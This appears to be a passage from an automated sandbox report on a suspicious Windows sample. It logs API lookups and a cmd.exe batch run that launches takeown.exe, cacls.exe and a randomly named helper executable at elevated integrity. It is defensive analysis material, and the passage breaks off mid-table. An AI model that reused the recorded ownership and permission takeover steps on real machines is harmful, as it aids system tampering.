| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x779cda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x779ef190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x779ea200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x751574f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75149fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75142d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x751475a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x751425e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75156870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x751568c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75156900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75149700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75141b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x779f2570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75147920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x779e9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x751562a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75156590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75156860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75149680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x751564a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7514a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x751728e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7514a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75156020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x751477b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7514fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75149a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75141ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75141da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75149930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7514a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75148770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7514fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75149fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75147910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75149a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75142dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75141d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75142b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7514a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7514a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x779cbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x751564f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x74c7ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x74c7fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x74c795e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x74c80680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x74c7ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x74c7f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x74c7ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x74c7ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x74c7f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x74c806c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x74c7efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x74c7f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x74ebc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x7741ee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x773f55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x773f57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x773f9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x773f0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x7741fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x74ae38f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x74afb6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x74afb430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x74ae7740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x74af74e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x74afefa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x74b04ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x74af4580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x74af1540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x745d1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x745d1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x745d1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7514a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7514f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75147580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75149910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75156030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75155f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75155ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7514a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7514a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x779c40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x779bd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x779becf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75155720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x779be140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x779beb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x779f9990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x779f5540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x779e9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7514a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x75170a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74e60790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7514f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7514fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x75171030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7514a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x751714b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7514a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x751716f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75149970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74de3c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75148710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x751496e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-10-03 03:08:10 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #105: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #105 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" "C:\Program Files\MSBuild\expenditurevincenttablet.exe"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:33, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:28 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf4c |
| Parent PID | 0xbd0 (c:\users\ciihmnxmn6ps\desktop\current_dirnwovkcyl.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F70
0x
290
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00033fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x002fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x0060ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x004cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000510000 | 0x00510000 | 0x0060ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00610000 | 0x00946fff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x013d0000 | 0x0141ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001420000 | 0x01420000 | 0x0541ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x74540000 | 0x74547fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ed80000 | 0x7ed80000 | 0x7ee7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ee80000 | 0x7ee80000 | 0x7eea2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007eea6000 | 0x7eea6000 | 0x7eea8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eea9000 | 0x7eea9000 | 0x7eea9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eeac000 | 0x7eeac000 | 0x7eeacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eead000 | 0x7eead000 | 0x7eeaffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | vIDhS3md.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 81 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 60 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 35 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 120, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xfc4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0x5b8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vIDhS3md.exe | os_pid = 0xb30, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x13d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75172780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7514fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74e435c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "expenditurevincenttablet.exe" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "expenditurevincenttablet.exe" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #106: vidhs3md64.exe
67
0
| Information | Value |
|---|---|
| ID | #106 |
| File Name | c:\users\ciihmn~1\appdata\local\temp\vidhs3md64.exe |
| Command Line | vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:35, Reason: Child Process |
| Unmonitor | End Time: 00:04:43, Reason: Self Terminated |
| Monitor Duration | 00:00:08 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf00 |
| Parent PID | 0xbd4 (c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F6C
0x
224
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00026fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00043fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0014ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00153fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00171fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00180000 | 0x0023dfff | Memory Mapped File | r |
|
|
|
- |
| imm32.dll | 0x00240000 | 0x00273fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x00246fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x00250fff | Private Memory | rw |
